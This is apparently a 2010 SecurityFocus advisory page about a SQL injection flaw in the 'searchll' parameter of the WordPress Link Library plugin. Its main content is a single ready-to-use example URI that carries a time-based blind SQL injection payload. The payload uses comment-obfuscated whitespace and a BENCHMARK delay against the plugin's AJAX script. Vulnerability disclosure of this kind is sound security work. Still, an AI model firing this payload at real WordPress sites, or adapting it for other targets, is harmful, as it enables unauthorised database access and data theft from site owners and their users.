WordPress Link Library Plugin 'searchll' Parameter SQL Injection Vulnerability

The following example URI is available:

http://www.example.com/wp-content/plugins/link-library/link-library-ajax.php?searchll=-1')/**/AND/**/1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23


 

Privacy Statement
Copyright 2010, SecurityFocus